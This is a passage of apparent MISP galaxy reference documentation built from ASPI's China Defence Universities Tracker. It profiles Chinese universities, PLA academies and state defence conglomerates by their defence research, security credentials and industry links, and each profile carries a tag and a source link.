Table 845. Table References

Links

https://unitracker.aspi.org.au/universities/army-research-institute

Army Service Academy (中国人民解放军陆军勤务学院)

The Army Service Academy is an institution of higher education in the PLA devoted to training personnel in a variety of logistics disciplines. The logistics disciplines taught at the academy include: fuel logistics, military facility management, military procurement management, and integrated logistics management. Its areas of focus for defence research include military energy engineering, defence engineering, and management science and engineering.

The tag is: misp-galaxy:china-defence-universities="Army Service Academy (中国人民解放军陆军勤务学院)"

Table 846. Table References

Links

https://unitracker.aspi.org.au/universities/army-service-academy

Army Special Operations Academy (中国人民解放军陆军特种作战学院)

The academy’s key subjects include special operations command, surveillance and intelligence, and command information systems engineering.

The tag is: misp-galaxy:china-defence-universities="Army Special Operations Academy (中国人民解放军陆军特种作战学院)"

Table 847. Table References

Links

https://unitracker.aspi.org.au/universities/army-special-operations-academy

Aviation Industry Corporation of China (中国航空工业集团有限公司)

AVIC is a state-owned defence conglomerate established in 2008 that focuses on providing aerospace products for military and civilian customers. AVIC’s main product lines include a variety of aircraft for freight, commercial and military aviation along with other more specialised products such as printed circuit boards, liquid crystal displays and automotive parts, according to Bloomberg. AVIC also provides services to the aviation sector through flight testing, engineering, logistics and asset management. The conglomerate has over 400,000 employees and has a controlling share in around 200 companies. AVIC has over 25 subsidiaries listed on its website. AVIC is the PLA Air Force’s largest supplier of military aircraft, producing fighter jets, strike aircraft, unmanned aerial vehicles and surveillance aircraft. Along with its core work on military aircraft, AVIC also produces surface-to-air, air-to-surface and air-to-air missiles. Its headline projects include the J-10 and the J-11 fighter aircraft. AVIC’s subsidiary, the Shenyang Aircraft Corporation, was responsible for delivery of the J-15 fighter. Another subsidiary of AVIC, the Chengdu Aerospace Corporation, developed the PLA-AF’s J-20 stealth fighter jet.

The tag is: misp-galaxy:china-defence-universities="Aviation Industry Corporation of China (中国航空工业集团有限公司)"

Table 848. Table References

Links

https://unitracker.aspi.org.au/universities/aviation-industry-corporation-of-china

Aviation University of Air Force (中国人民解放军空军航空大学)

AUAF is one of China’s main institutions devoted to the training of air force pilots. Its areas of focus are training in flight command and research into aeronautical engineering. Disciplines taught at AUAF include command science and engineering, aerospace science and technology as well as political work and military command. AUAF scientists publish and attend conferences on radar technology and electronic countermeasures. For example, scientists from AUAF’s Information Countermeasures Division co-authored a publication on radar target recognition with a researcher from the PLA’s Unit 94936 – an aviation unit stationed in Hangzhou. AUAF scientists have also done notable work on complex systems radar and signal pre-sorting.

The tag is: misp-galaxy:china-defence-universities="Aviation University of Air Force (中国人民解放军空军航空大学)"

Table 849. Table References

Links

https://unitracker.aspi.org.au/universities/aviation-university-of-air-force

Beihang University (北京航空航天大学)

Beihang University engages in very high levels of defence research as one of the ‘Seven Sons of National Defence’ subordinate to the Ministry of Industry and Information Technology. The university specialises in aviation and spaceflight research. The top four employers of Beihang graduates in 2018 were all state-owned missile or defence aviation companies. In total, 29% of 2018 Beihang graduates who found employment were working in the defence sector. Beihang scientists are involved in the development of Chinese military aircraft and missiles. In 2018, the university signed a comprehensive strategic cooperation agreement with China Aerospace Science and Technology Corporation, a state-owned conglomerate that produces ballistic missiles and satellites. The university is also noteworthy for its leading research on stealth technology. Beihang hosts at least eight major defence laboratories working on fields such as aircraft engines, inertial navigation and fluid dynamics.

The tag is: misp-galaxy:china-defence-universities="Beihang University (北京航空航天大学)"

Table 850. Table References

Links

https://unitracker.aspi.org.au/universities/beihang-university

Beijing Electronic Science and Technology Institute (北京电子科技学院)

BESTI is a secretive university that trains information security experts for the bureaucracy. The institute is the only university run by the CCP General Office, which manages administrative matters for the Central Committee. The General Office is usually run by one of the general secretary’s most trusted aides. It oversees China’s cryptographic and state secrets agency as well as security for the party’s leadership. BESTI has a student population of around 2,000 and has strict admission requirements. Students at the university are scrutinized for their political beliefs, and are typically CCP or Communist Youth League members. The activities of their relatives are screened for political issues. Having no parents or siblings who worked abroad or were involved in ‘illegal organisations’ is a condition of enrolment. The institute claims to count 50 ministerial-level party officials among its 12,000 graduates. BESTI has a close relationship with Xidian University and Beijing University of Posts and Telecommunications. The two universities are its primary collaborators on scientific papers. BESTI runs joint master’s programs with Xidian University in cryptography, information and communication engineering, and computer applications technology. It also has joint doctoral programs with the University of Science and Technology of China and Beijing University of Posts and Telecommunications in cybersecurity. The university runs the Key Laboratory of Information Security (信息安全重点实验室/信息安全与保密重点实验室). Several websites claim that it runs a joint laboratory with the Chinese Academy of Sciences Institute of High Energy Physics, but this could not be confirmed.

The tag is: misp-galaxy:china-defence-universities="Beijing Electronic Science and Technology Institute (北京电子科技学院)"

Table 851. Table References

Links

https://unitracker.aspi.org.au/universities/beijing-electronic-science-and-technology-institute

Beijing Institute of Technology (北京理工大学)

BIT is one of the ‘Seven Sons of National Defence’ supervised by MIIT. It is a leading centre of military research and one of only fourteen institutions accredited to award doctorates in weapons science. In 2017, China’s Ministry of Education ranked BIT and Nanjing University of Science and Technology as the country’s top institutions for weapons science. It has received the most defence research prizes and defence patents out of all China’s universities. 31.80% of BIT graduates in 2018 who found employment were working in the defence sector. BIT’s claimed achievements include producing the PRC’s first light tank, first two-stage solid sounding rocket and first low-altitude altimetry radar. The university also states that it carries out world-class research on several areas of missile technology including “precision strikes, high damage efficiency, maneuver penetration, long-range suppression, and military communications systems and counter-measures”. In 2018, BIT announced that it was running a four-year experimental program training some of China’s top high school students in intelligent weapons systems. BIT is the chair of the B8 Cooperation Innovation Alliance (B8协同创新联盟 or 中国兵器协同创新联盟), a group of eight Chinese research institutions that specialize in weapons science—the ‘B’ in ‘B8’ stands for the Chinese word for armaments, bingqi (兵器). BIT’s central role in advancing PLA warfighting capability is demonstrated by the fact that it participated in the development of equipment used by 22 of the 30 squads in the 2009 military parade for the 60th anniversary of the founding of the PRC.

The tag is: misp-galaxy:china-defence-universities="Beijing Institute of Technology (北京理工大学)"

Table 852. Table References

Links

https://unitracker.aspi.org.au/universities/beijing-institute-of-technology

Beijing University of Chemical Technology (北京化工大学)

BUCT is subordinate to the Ministry of Education. The university engages in high levels of defence research. In 2016, the Ministry of Education and defence industry agency SASTIND agreed to jointly construct BUCT, a move designed to expand its involvement in defence research. Between 2011 and 2015, the university’s spending on defence research reached RMB272 million (AUD56 million), approximately 15% of the university’s research spending and an increase of around 50% over the previous five years. BUCT specialises in the development and application of critical materials for the defence industry. Its research on carbon fibres has been applied to the aerospace industry. BUCT holds secret-level security credentials, allowing it to participate in classified defence and weapons technology projects.

The tag is: misp-galaxy:china-defence-universities="Beijing University of Chemical Technology (北京化工大学)"

Table 853. Table References

Links

https://unitracker.aspi.org.au/universities/beijing-university-of-chemical-technology

Beijing University of Posts and Telecommunications (北京邮电大学)

BUPT is subordinate to the Ministry of Education in addition to being jointly constructed by the Ministry of Industry and Information Technology. BUPT is one of eight Chinese universities known to have received top-secret security credentials. Since its establishment, the university has focused on information engineering and computer science, and has continued to produce important defence and security technology research. The School of Cyberspace Security is home to one of the university’s two defence laboratories—the Key Laboratory of Network and Information Attack & Defense Technology of Ministry of Education—which carries out research for the Chinese military related to cyber attacks. BUPT is a member of several military-civilian fusion (MCF) alliances and has been awarded for its contributions to MCF and the PLA. During the past three years, major employers of BUPT graduates include the Ministry of State Security, the Ministry of Public Security and MIIT. This suggests a close relationship between BUPT and China’s security and intelligence agencies.

The tag is: misp-galaxy:china-defence-universities="Beijing University of Posts and Telecommunications (北京邮电大学)"

Table 854. Table References

Links

https://unitracker.aspi.org.au/universities/beijing-university-of-posts-and-telecommunications

Central South University (中南大学)

Out of all universities subordinate to the MOE, CSU reportedly receives the most military research funding and was the first to receive a weapons production license. In 2008 and 2011 respectively, the defence industry agency SASTIND and the Ministry of Education (MOE) signed agreements to jointly supervise CSU. Under this arrangement, SASTIND committed to expanding CSU’s involvement in defence research and support the development of its School of Aeronautics and Astronautics and Military Industry Technology Research Institute. CSU’s defence research appears to focus on metallurgy, materials science, and aviation technology, including the development of heat-resistant materials for aeroplane and rocket engines. The university has been involved in the development of China’s first atomic bomb, first intermediate-range ballistic missile, and first nuclear submarine. In 2018, it signed a strategic cooperation agreement with the Chinese Academy of Launch Vehicle Technology, a subsidiary of China Aerospace Science and Technology Corporation that is included on the US BIS Entity List for its involvement in developing rockets.

The tag is: misp-galaxy:china-defence-universities="Central South University (中南大学)"

Table 855. Table References

Links

https://unitracker.aspi.org.au/universities/central-south-university

Changchun University of Science and Technology (长春理工大学)

CUST is primarily supervised by the Jilin Provincial Government but has also been under the administration of SASTIND and its predecessors for over 30 years over its history. The university specialises in photoelectric technology and has a strong focus on defence research. CUST describes itself as having ‘safeguarding national defence as its sublime responsibility and sacred mission.’ CUST is a member of the B8 Cooperation Innovation Alliance (B8协同创新联盟 or 中国兵器协同创新联盟), a group of eight Chinese research institutions that specialize in armaments science—the ‘B’ in ‘B8’ stands for the Chinese word for armaments, bingqi (兵器). In April 2018, CUST established the School of Artificial Intelligence (人工智能学院) and the Artificial Intelligence Research Institute (人工智能研究院). CUST researchers working on AI are likely involved in research related to facial recognition technology.

The tag is: misp-galaxy:china-defence-universities="Changchun University of Science and Technology (长春理工大学)"

Table 856. Table References

Links

https://unitracker.aspi.org.au/universities/changchun-university-of-science-and-technology

China Aerodynamics Research and Development Center (中国空气动力研究与发展中心)

CARDC claims to be China’s largest aerodynamics research and testing base. It hosts the State Key Laboratory of Aerodynamics (空气动力学国家重点实验室), which includes five wind tunnels and a large computer cluster. CARDC is heavily involved in research on hypersonics. While CARDC is a military unit, its website does not mention this. The PLA officers leading the facility are instead pictured on its website in civilian clothes (pictured: CARDC director, Major General Fan Zhaolin (范召林), in uniform (above) and in civilian attire on CARDC’s website (below)).

The tag is: misp-galaxy:china-defence-universities="China Aerodynamics Research and Development Center (中国空气动力研究与发展中心)"

Table 857. Table References

Links

https://unitracker.aspi.org.au/universities/china-aerodynamics-research-and-development-center

China Aerospace Science and Industry Corporation (中国航天科工集团有限公司)

CASIC specialises in defence equipment and aerospace products, particularly short- and medium-range missiles. CASIC is a leading provider to the Chinese military of high-end capabilities such as air-defence, cruise, and ballistic missile systems along with space launch vehicles, micro-satellites and anti-satellite interceptors, according to Mark Stokes and Dean Cheng. CASIC employs over 146,000 employees and is on the Fortune 500 list with revenue exceeding USD37 billion (AUD55 billion). Although defence products form part of CASIC’s main product line, the company also produces products for civilian customers such as electronics, communications equipment and medical equipment. Nevertheless, CASIC claims that it ‘will always uphold its core value of ranking national interests above all’, which indicates that civilian products receive less priority than defence equipment.

The tag is: misp-galaxy:china-defence-universities="China Aerospace Science and Industry Corporation (中国航天科工集团有限公司)"

Table 858. Table References

Links

https://unitracker.aspi.org.au/universities/china-aerospace-science-and-industry-corporation

China Aerospace Science and Technology Corporation (中国航天科技集团)

CASC was established in 1999 as a defence aerospace conglomerate. The company is primarily focused on ‘developing carrier rockets, various kinds of satellites, … and tactical missile systems.’ With revenues nearing USD38 billion (AUD55 billion), CASC employs nearly 180,000 personnel and is on the Fortune 500 list. PLA experts Mark Stokes and Dean Cheng have noted that CASC’s main products for the PLA include ‘ballistic missiles and space launch vehicles, large solid rocket motors, liquid fuelled engines, satellites, and related sub-assemblies and components.’ The Federation of American Scientists claims CASC is particularly advanced in high-energy propellant technology, satellite applications, strap-on boosters and system integration. CASC maintains an investment business which may be geared towards civilian purposes, according to Bloomberg. The Federation of American Scientists notes that some civilian product lines for CASC include ‘machinery, chemicals, communications equipment, transportation equipment, computers, medical care products and environmental protection equipment.’ CASC oversees multiple research academies, which have been separately identified by Mark Stokes and Dean Cheng and by the Nuclear Threat Initiative. The Nuclear Threat Initiative has identified that CASC has the following subordinate companies:

The tag is: misp-galaxy:china-defence-universities="China Aerospace Science and Technology Corporation (中国航天科技集团)"

Table 859. Table References

Links

https://unitracker.aspi.org.au/universities/china-aerospace-science-and-technology-corporation

China Coast Guard Academy (中国人民武装警察部队海警学院)

The China Coast Guard Academy is an institution of higher learning that trains personnel for entry into China’s maritime border defence agency. The academy conducts research and training in maritime law enforcement, warship technology as well as surveillance and intelligence disciplines. The China Coast Guard Academy established the Large Surface Vessel Operation and Simulation Laboratory (大型船艇操纵仿真实验室) in 2016, which focuses on the development of white-hulled boats for the China Coast Guard.

The tag is: misp-galaxy:china-defence-universities="China Coast Guard Academy (中国人民武装警察部队海警学院)"

Table 860. Table References

Links

https://unitracker.aspi.org.au/universities/china-coast-guard-academy

China Electronics Corporation (中国电子信息产业集团有限公司)

CEC is a state-owned conglomerate that produces dual-use electronics. The company was established in 1989 to produce semi-conductors, electronic components, software and telecommunications products. The company describes itself as a defence industry conglomerate. CEC is one of China’s largest companies with nearly 120 thousand employees. CEC claims to hold 22 subordinate enterprises and 14 listed companies. Global Security has provided a list of CEC’s 36 member companies in English. CEC is divided into two operational groups. First is the China Electronics Party Institute (中国电子党校), which provides disciplinary oversight and organises communist party activities within CEC. Second is the Science and Technology Committee (科学技术委员会), which is responsible for research and development within CEC. CEC’s defence electronics are developed by the Military Engineering Department (军工部) within CEC’s Science and Technology Committee. Key defence electronics produced by CEC include tracking stations, radar technology, as well as command and control systems. The company maintains its own office for the management of classified information related to defence research. The Federation of American Scientists has identified CEC’s defence-related enterprises on a list that can be found here.

The tag is: misp-galaxy:china-defence-universities="China Electronics Corporation (中国电子信息产业集团有限公司)"

Table 861. Table References

Links

https://unitracker.aspi.org.au/universities/china-electronics-corporation

China Electronics Technology Group Corporation (中国电子科技集团公司)

CETC is a state-owned defence conglomerate that specialises in dual-use electronics. The company was established in 2002 by bringing dozens of research institutes administered by the Ministry of Information Industry, the predecessor to the Ministry of Industry and Information Technology, under one umbrella. CETC is one of the world’s largest defence companies. It claims to have 523 subordinate units and companies and 160,000 employees. CETC divides its defence electronics products into seven categories: air base early warning, integrated electronic information systems, radar, communication and navigation, electronic warfare, UAVs and integrated IFF (identification, friend or foe). CETC also provides technology used for human rights abuses in Xinjiang, where approximately 1.5m are held in re-education camps. Several CETC research institutes and subsidiaries have been added to the US Government’s entity list, restricting exports to them on national security grounds. CETC has been implicated by the US Department of Justice in at least three cases of illegal exports. CETC has a large international market and has also expanded its international research collaboration in recent years. It has a European headquarters in Graz, Austria, and has invested in the University of Technology Sydney.

The tag is: misp-galaxy:china-defence-universities="China Electronics Technology Group Corporation (中国电子科技集团公司)"

Table 862. Table References

Links

https://unitracker.aspi.org.au/universities/china-electronics-technology-group-corporation

China National Nuclear Corporation (中国核工业集团有限公司)

CNNC is the leading state-owned enterprise for China’s civilian and military nuclear programs. It consists of more than 200 subordinate enterprises and research institutes, many of which are listed on the Nuclear Threat Initiative website. In 2018, CNNC took over China’s main nuclear construction company, China Nuclear Engineering and Construction Group (中国核工业建设集团). The company is organized into eight industrial sectors, including nuclear power, nuclear power generation, nuclear fuel, natural uranium, nuclear environmental protection, application of nuclear technologies, non-nuclear civilian products and new energy sources. CNNC is mainly engaged in research and development, design, construction and production operations in the fields of nuclear power, nuclear fuel cycle, nuclear technology application, and nuclear environmental protection engineering. Because of the dual-use nature of nuclear technologies, the nuclear industry is a typical military-civil fusion industry. Naval nuclear power technology and nuclear reactor technology in the reactor core, fuel assembly, safety and security, and radioactive waste treatment all use the same or very similar processes. In March 2019, CNNC established a military-civil fusion fund dedicated to dual-use nuclear technology research and design. Two CNNC subsidiaries have been added to the US Government’s Entity List, restricting exports to them on national security grounds. CNNC has cooperated with U.S. Westinghouse Electric to construct AP1000 nuclear power plants. The company also has a significant overseas presence, signing agreements for joint research with U.S., French, Canadian, U.K., Russian and Argentinian companies.

The tag is: misp-galaxy:china-defence-universities="China National Nuclear Corporation (中国核工业集团有限公司)"

Table 863. Table References

Links

https://unitracker.aspi.org.au/universities/china-national-nuclear-corporation

China North Industries Group (中国兵器工业集团公司)

Norinco Group was established in 1999 as a state-owned defence conglomerate devoted to the development and production of armaments for Chinese and foreign defence customers. Its main defence products include artillery and tear gas, air defence and anti-missile systems, anti-tank missiles and precision-guided munitions as well as armoured vehicles such as main battle tanks and infantry combat vehicles. Bloomberg reports that Norinco Group’s civilian products include various engineering services and heavy-duty construction equipment. Norinco Group employs over 210,000 personnel, has revenues exceeding US$68.8 billion and is listed on the Fortune 500. Norinco Group has hundreds of subsidiaries and subordinate research institutes in China and around the world that have been catalogued by the International Peace Information Service and Omega Research Foundation in their working paper on the company and on Norinco Group’s website. Norinco Group’s Institute of Computer Application Technology (中国兵器工业计算机应用技术研究所) was one of the first adopters of internet technology and remains a leading company for research into network security. The institute hosts four internet research centres and is reported to work with the National Administration for State Secrets Protection (国家保密局) on the Information Security and Testing and Evaluation Centre (涉密信息系统安全保密测评中心).

The tag is: misp-galaxy:china-defence-universities="China North Industries Group (中国兵器工业集团公司)"

Table 864. Table References

Links

https://unitracker.aspi.org.au/universities/china-north-industries-group

China People’s Police University (中国人民警察大学)

The China People’s Police University is an institution of higher learning devoted to training active duty police officers and firefighters in command and management as well as specialist technical officers. The curriculum is separated into two main streams, one for police officers and the other for firefighters. Its police disciplines include immigrant management, entry-exit and border control management, security intelligence, cyber-security, and political work. Its firefighting disciplines include firefighting engineering, electronic information engineering, and nuclear and biochemical fire control. Research facilities at the university include:

The tag is: misp-galaxy:china-defence-universities="China People’s Police University (中国人民警察大学)"

Table 865. Table References

Links

https://unitracker.aspi.org.au/universities/china-peoples-police-university

China Shipbuilding Industry Corporation (中国船舶重工集团有限公司)

CSIC was established as one of China’s primary state-owned defence companies on 1 July 1999. CSIC is the PLA Navy’s largest supplier of weapons platforms, accounting for nearly 80 per cent of all armaments. CSIC’s signature products include conventional and nuclear submarines, warships and torpedoes, as well as the Liaoning aircraft carrier program. CSIC maintains a civilian shipbuilding program alongside its program of supplying the PLA Navy. CSIC’s civilian work includes the production of oil and chemical tankers, container ships, bulk carriers and engineering ships. On 2 July 2019, it was announced that CSIC and the China State Shipbuilding Corporation would merge. According to Jane’s Defence Weekly, ‘the two groups, which have combined assets of about USD120 billion and employ 240,000 people, dominate naval shipbuilding in China and between them operate 160 subsidiaries.’ Nikkei has listed some of CSIC’s main subsidiaries here.

The tag is: misp-galaxy:china-defence-universities="China Shipbuilding Industry Corporation (中国船舶重工集团有限公司)"

Table 866. Table References

Links

https://unitracker.aspi.org.au/universities/china-shipbuilding-industry-corporation

China South Industries Group (中国兵器装备集团有限公司)

CSGC is a leading producer of armaments for the People’s Liberation Army. It was founded in 1999 and works on technologies such as advanced munitions, mobile assault weapons, light armaments, information optoelectronics and counter-terrorism equipment. CSGC also maintains civilian product lines focused on the oil and energy sector, but most of the company’s attention goes to developing armaments. The company employs nearly 200,000 personnel, its revenue approaches USD34 billion (AUD50 billion) and it is listed as a Fortune 500 company. CSGC holds a controlling share in more than 60 subsidiaries. 32 of these are listed on the company’s website.

The tag is: misp-galaxy:china-defence-universities="China South Industries Group (中国兵器装备集团有限公司)"

Table 867. Table References

Links

https://unitracker.aspi.org.au/universities/china-south-industries-group

China State Shipbuilding Corporation (中国船舶工业集团有限公司)

CSSC was established as one of China’s primary state-owned weapons companies on 1 July 1999 to build ships for military and civilian customers. CSSC markets itself as the ‘backbone’ of the Chinese navy and its core products include a variety of warships and support vessels. Alongside its program supporting the PLA Navy, Bloomberg notes that CSSC ‘produces oil tankers, bulk carriers, conditioner vessels, deepwater survey ships, and marine equipment.’ On 2 July 2019, it was announced that the China Shipbuilding Industry Corporation and the CSSC would merge. According to Jane’s Defence Weekly, ‘the two groups, which have combined assets of about USD120 billion (AUD178 billion) and employ 240,000 people, dominate naval shipbuilding in China and between them operate 160 subsidiaries.’

The tag is: misp-galaxy:china-defence-universities="China State Shipbuilding Corporation (中国船舶工业集团有限公司)"

Table 868. Table References

Links

https://unitracker.aspi.org.au/universities/china-state-shipbuilding-corporation

China University of Geosciences (Wuhan) (中国地质大学)

CUG is subordinate to the Ministry of Education and also supervised by China’s Ministry of Land and Resources. It is actively engaged in defence research and training on geology, hosting the defence-focused Ministry of Education Key Laboratory on Geological Exploration and Evaluation. The laboratory was established in 2018, has 56 staff, and trains students in ‘military geology’. CUG gained secret-level security credentials in 2009, enabling it to participate in classified defence projects.

The tag is: misp-galaxy:china-defence-universities="China University of Geosciences (Wuhan) (中国地质大学)"

Table 869. Table References

Links

https://unitracker.aspi.org.au/universities/china-university-of-geosciences-wuhan

China University of Mining and Technology (中国矿业大学)

CUMT is subordinate to the Ministry of Education and specialises in engineering and other mining and industry-related disciplines. It engages in low levels of defence research. CUMT’s defence research revolves around manufacturing and design, materials science, control science, electronic components, power and energy, and bionics. It appears to be involved in the construction and design of underground bunkers for the military. The academic committee of its State Key Laboratory for Geomechanics and Deep Underground Engineering (深部岩石力学与地下工程国家红点实验室) is headed by PLA underground engineering expert Qian Qihu (钱七虎).

The tag is: misp-galaxy:china-defence-universities="China University of Mining and Technology (中国矿业大学)"

Table 870. Table References

Links

https://unitracker.aspi.org.au/universities/china-university-of-mining-and-technology

Chinese Academy of Engineering Physics (中国工程物理研究院)

CAEP was founded in 1958 and now has over 24,000 employees. It is headquartered in Mianyang, Sichuan Province, but also has facilities in Chengdu and Beijing. Notably, Mianyang is home to a military-civil fusion (MCF) demonstration base—the Sichuan Mianyang High-Technology City. Sichuan Military District Commander Jiang Yongshen (姜永申) in 2016 stressed the important role that Mianyang plays in China’s larger science and technology development and the significance of its military-civil fusion (MCF) demonstration base. The academy is best known for nuclear weapons, but also carries out research on directed-energy weapons. CAEP’s four main tasks are to develop nuclear weapons, research microwaves and lasers for nuclear fusion ignition and directed-energy weapons, study technologies related to conventional weapons, and deepen military-civil fusion. It claims that its research covers 260 specialisations, primarily in the broad areas of physics and mathematics, mechanics and engineering, materials and chemistry, electronics and information, and optics and electrical engineering. CAEP hosts part of the Tianhe-2 supercomputer, one of the world’s fastest supercomputers. Despite the sensitivity of its work, CAEP has expanded its international presence in recent years. It claims to send hundreds of scientists overseas to study or work as visiting scholars. CAEP has also used Chinese government talent recruitment schemes such as the Thousand Talents Plan to recruit dozens of scientists from abroad. By 2015, CAEP had recruited 57 scholars through the Thousand Talents Plan, making it one of the largest recruiters of Thousand Talents Plan scholars. CAEP maintains strong collaborative relationships with Chinese civilian universities. It runs a joint laboratory with the University of Electronic Science and Technology of China and collaborates with universities and research institutions including the Chinese Academy of Sciences, the University of Science and Technology of China, Shandong University, Southwest University of Science and Technology, Sichuan University, Jilin University, Peking University and Tsinghua University. CAEP sponsors postgraduate students in many of these institutions who are required to work there for five years after graduating.

The tag is: misp-galaxy:china-defence-universities="Chinese Academy of Engineering Physics (中国工程物理研究院)"

Table 871. Table References

Links

https://unitracker.aspi.org.au/universities/chinese-academy-of-engineering-physics

Chongqing University (重庆大学)

CQU is a leading Chinese research institution subordinate to the Ministry of Education. Chongqing University is home to at least two laboratories devoted to defence research on nanotechnology and control systems. An institution accredited to conduct classified research, Chongqing University is active in improving its security culture with respect to the safeguarding of official secrets. In December 2016, the Ministry of Education entered an agreement with defence industry agency SASTIND to advance military-civil fusion at Chongqing University. Following this agreement, Chongqing University established the defence-focused Ministry of Education Key Laboratory for Complex Systems Safety and Autonomous Control in May 2018, which works on control systems engineering.

The tag is: misp-galaxy:china-defence-universities="Chongqing University (重庆大学)"

Table 872. Table References

Links

https://unitracker.aspi.org.au/universities/chongqing-university

Chongqing University of Posts and Telecommunications (重庆邮电大学)

CQUPT is involved in research on wireless network engineering and testing, next-generation wideband wireless communication, computer networking and information security, intelligent information processing, advanced manufacturing, micro-electronics and specialized chip design. It ranks among the top 100 universities in China for science and technology. The university is supervised by the Ministry of Industry and Information Technology and the Chongqing Municipal Government. It holds secret-level security credentials, allowing it to participate in classified defence technology projects.

The tag is: misp-galaxy:china-defence-universities="Chongqing University of Posts and Telecommunications (重庆邮电大学)"

Table 873. Table References

Links

https://unitracker.aspi.org.au/universities/chongqing-university-of-posts-and-telecommunications

Chongqing University of Technology (重庆理工大学)

CQUT is a member of the B8 Cooperation Innovation Alliance (B8协同创新联盟 or 中国兵器协同创新联盟), a group of eight Chinese research institutions that specialize in armament science—the ‘B’ in ‘B8’ stands for the Chinese word for armaments, bingqi (兵器). However, its involvement in defence research does not appear as expansive as the other B8 members and it is a relatively low-ranked university. In 2017, its president stated that ‘Chongqing is an important site for the weapons industry, but its military-industrial research and development ability has not yet upgraded.’ Unlike the other members of the B8, SASTIND does not appear to supervise the university. The university has links to Norinco Group and China South Industries Group, China’s largest weapons manufacturers, and was under the supervision of the conglomerates’ predecessor, China Ordnance Industry Corporation, until 1999. In 2017 and 2018, it signed partnerships with four local defence companies to collaborate on research and training. In 2011, CQUT received secret-level security credentials, enabling it to participate in classified defence projects.

The tag is: misp-galaxy:china-defence-universities="Chongqing University of Technology (重庆理工大学)"

Table 874. Table References

Links

https://unitracker.aspi.org.au/universities/chongqing-university-of-technology

Commercial Aircraft Corporation of China (中国商用飞机有限责任公司)

COMAC was established in 2008 as a state-owned manufacturer of large commercial aircraft. The company oversees eleven subsidiaries that focus on various aspects of aircraft production. A list of COMAC’s subordinate companies can be found in English on the company’s website. Despite its focus on commercial aircraft, China’s Ministry of Industry and Information Technology has referred to it as a defence industry conglomerate. The company maintains strong links to China’s defence industry and some of its leadership is drawn from former executives at state-owned military aircraft and missile manufacturers. China’s leading producer of military aircraft, the Aviation Industry Corporation of China (AVIC), also holds a 10 per cent share in COMAC. COMAC supports the continued development of China’s defence industry by awarding ‘national defence technology scholarships’ to Chinese university students. COMAC’s signature passenger aircraft, the C919, offers an example of how the company could use its civilian aircraft production for military purposes. Numerous Chinese analysts have studied Boeing’s conversion of the 737 into the P-8 Poseidon and E-7A surveillance aircraft and argue that the C919 could also be retrofitted for early warning as well as anti-surface and anti-submarine warfare missions. With a greater flight range than China’s other military aircraft, a retrofitted C919 for maritime surveillance operations could reduce China’s dependence on artificial air bases in the South China Sea which currently render aircraft vulnerable to corrosion due to harsh weather conditions. Vice-Chairman of the Central Military Commission, Zhang Youxia, reportedly expressed an interest in learning from American companies in converting civilian aircraft into military aircraft while inspecting COMAC’s C919.

The tag is: misp-galaxy:china-defence-universities="Commercial Aircraft Corporation of China (中国商用飞机有限责任公司)"

Table 875. Table References

Links

https://unitracker.aspi.org.au/universities/commercial-aircraft-corporation-of-china

Criminal Investigation Police University of China (中国刑事警察学院)

CIPUS was founded in May 1948 and underwent several name changes, but was upgraded in 1981 to become the first police university offering a specialised undergraduate degree program. It runs a national engineering laboratory, two MPS key laboratories, and provincial key laboratories. It is focused on training in criminal investigation, criminology science and technology and criminal law. The university also has relationships with companies that provide the technological tools that contribute to the PRC’s public security apparatus. For instance, it has a relationship with the company Haiyun Data on public security intelligence. Haiyun provides data visualization services for MPS bureaus across China.

The tag is: misp-galaxy:china-defence-universities="Criminal Investigation Police University of China (中国刑事警察学院)"

Table 876. Table References

Links

https://unitracker.aspi.org.au/universities/criminal-investigation-police-university-of-china

Dalian Minzu University (大连民族大学)

DLMU was established in 1984 as an institution that researches China’s ethnic minorities. The university is overseen by the State Ethnic Affairs Commission (SEAC), the Liaoning Provincial Government and the Dalian Municipal Government. Scientific disciplines taught by DLMU include communications and information engineering, machine engineering, civil engineering and environmental science. DLMU also researches political thought and minority groups of northeast China. DLMU currently hosts the Dalian Key Lab of Digital Technology for National Culture (大连市民族文化数字技术重点实验室). Researchers at the laboratory carry out research on facial recognition of ethnic minorities. The laboratory has collaborated with an academic from Curtin University on research related to the facial recognition of Tibetans, Koreans and Uyghurs—over one million of whom have disappeared into re-education camps. DLMU researchers are working on a database of facial and optical movements across different ethnic groups. DLMU also hosts the State Ethnic Affairs Commission Key Laboratory of Intelligent Perception and Advanced Control (国家民委智能感知与先进控制重点实验室), housed within the university’s College of Electromechanical Engineering (机电工程学院). The laboratory has done work on convolutional neural networks for visual image recognition, which could have applications for surveillance technology. DLMU’s party committee has an active United Front Work Department. The department supervises non-CCP members and students returning from overseas study. Management of religious and ethnic minorities are likely to be other priorities for the department.

The tag is: misp-galaxy:china-defence-universities="Dalian Minzu University (大连民族大学)"

Table 877. Table References

Links

https://unitracker.aspi.org.au/universities/dalian-minzu-university

Dalian Naval Academy (中国人民解放军海军大连舰艇学院)

The Dalian Naval Academy is one of the main training colleges for junior officers and cadets in the PLA Navy. The academy focuses on maritime navigation technology, communications engineering, electronic information engineering, weapons systems engineering, surveying and control science. Scientists from the Dalian Naval Academy produce publications on a variety of defence topics, including:

The tag is: misp-galaxy:china-defence-universities="Dalian Naval Academy (中国人民解放军海军大连舰艇学院)"

Table 878. Table References

Links

https://unitracker.aspi.org.au/universities/dalian-naval-academy

Dalian University of Technology (大连理工大学)

DLUT is directly under the administration of the Ministry of Education. In 2018, it came under the supervision of defence industry agency SASTIND as part of the government’s efforts to deepen military-civil fusion in the university sector. In 2006, the university received secret-level security credentials, allowing it to participate in classified defence technology projects. Since then, it has expanded cooperation with the PLA Navy and joined several military-civil fusion innovation alliances. In 2015, the university established a defence laboratory in the School of Mechanical Engineering. The laboratory was proposed by a professor within the University’s Institute of Science and Technology. The Institute of Science and Technology is primarily responsible for high-tech project management, where they manage projects for the 973 Program, the National Natural Science Foundation, and the Ministry of Education.

The tag is: misp-galaxy:china-defence-universities="Dalian University of Technology (大连理工大学)"

Table 879. Table References

Links

https://unitracker.aspi.org.au/universities/dalian-university-of-technology

Donghua University (东华大学)

DHU is subordinate to the Ministry of Education. It is actively involved in defence research on materials. It hosts the Key Laboratory of High Performance Fibers & Products, a defence-focused laboratory involved in materials science and textiles engineering research for China’s defence industry and weapons systems. The laboratory is specifically involved in developing materials for weapons casings, vehicular armour, aviation and cabling. The university holds secret-level security credentials, allowing it to participate in classified defence research projects. DHU claims that much of its research has been applied to fields such as defence technology and aviation, and contributed towards China’s space program and Beidou satellite navigation system. In 2018, the university signed a strategic cooperation agreement with the state-owned Jihua Group (际华集团) for collaboration on textiles to meet the military’s needs.

The tag is: misp-galaxy:china-defence-universities="Donghua University (东华大学)"

